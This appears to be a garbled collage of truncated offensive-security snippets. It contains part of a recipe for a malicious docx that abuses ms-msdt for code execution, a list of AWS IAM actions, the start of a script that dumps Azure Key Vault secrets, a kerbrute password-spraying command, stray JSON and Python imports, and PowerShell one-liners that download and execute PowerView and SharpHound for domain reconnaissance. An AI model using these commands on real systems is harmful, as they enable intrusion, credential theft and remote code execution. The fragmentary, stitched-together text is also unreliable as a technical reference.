MS Office docx files may contain external OLE Object references as HTML files. There is a URL scheme "ms-msdt:" that invokes the msdt diagnostic tool, which is capable of executing arbitrary code (specified in parameters).
The result is a terrifying attack vector for getting RCE through opening malicious docx files (without using macros).
Here are the steps to build a Proof-of-Concept docx:
- Open Word (used up-to-date 2019 Pro, 16.0.10386.20017), create a dummy document, insert an (OLE) object (as a Bitmap Image), and save it as docx.
acm-pca:CreateCertificateAuthority
aws-marketplace:AcceptAgreementApprovalRequest
aws-marketplace:Subscribe
backup:PutBackupVaultLockConfiguration
bedrock:CreateProvisionedModelThroughput
bedrock:UpdateProvisionedModelThroughput
devicefarm:PurchaseOffering
dynamodb:PurchaseReservedCapacityOfferings
ec2:ModifyReservedInstances
ec2:PurchaseCapacityBlock
#Somewhat stolen from PowerZure Get-AzureKeyVaultContent and Show-AzureKeyVaultContent , thanks hausec!
#reimplemented by Flangvik to run in a single "Azure PowerShell" Agent job, inside an DevOps Pipeline
#Suppress warnings for clean output
Set-Item Env:\SuppressAzurePowerShellBreakingChangeWarnings "true"
#Get all Azure KeyVaults from currently selected/scoped subscription
#This connection is known as an "Service connection",and in terms of accessing Azure resources, uses either Service principal or Managed identity
$vaults = Get-AzKeyVault
With kerbrute.py:
python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>
With Rubeus version with brute module:
[
  {
    "ProviderGUID": "72d164bf-fd64-4b2b-87a0-62dbcec9ae2a",
    "ProviderName": "AccEventTool",
    "ProviderGroupGUID": "4f50731a-89cf-4782-b3e0-dce8c90476ba",
    "AssociatedFilenames": [
      "accevent.exe",
      "inspect.exe",
      "narrator.exe",
      "srh.dll"
#!/usr/bin/env python
# abuse cases and better implementation from the original discoverer: https://github.com/leechristensen/SpoolSample
# some code from https://www.exploit-db.com/exploits/2879/
import os
import sys
import argparse
import binascii
import ConfigParser
import time
import etw
import etw.evntrace
import sys
import argparse
import threading
class RundownDotNetETW(etw.ETW):
    def __init__(self, verbose, high_risk_only):
# Domain Recon
## ShareFinder - Look for shares on network and check access under current user context & Log to file
powershell.exe -exec Bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerView/powerview.ps1');Invoke-ShareFinder -CheckShareAccess|Out-File -FilePath sharefinder.txt"
## Import PowerView Module
powershell.exe -exec Bypass -noexit -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/dev/Recon/PowerView.ps1')"
## Invoke-BloodHound for domain recon
powershell.exe -exec Bypass -C "IEX(New-Object Net.Webclient).DownloadString('https://raw.githubusercontent.com/BloodHoundAD/BloodHound/master/Ingestors/SharpHound.ps1');Invoke-BloodHound"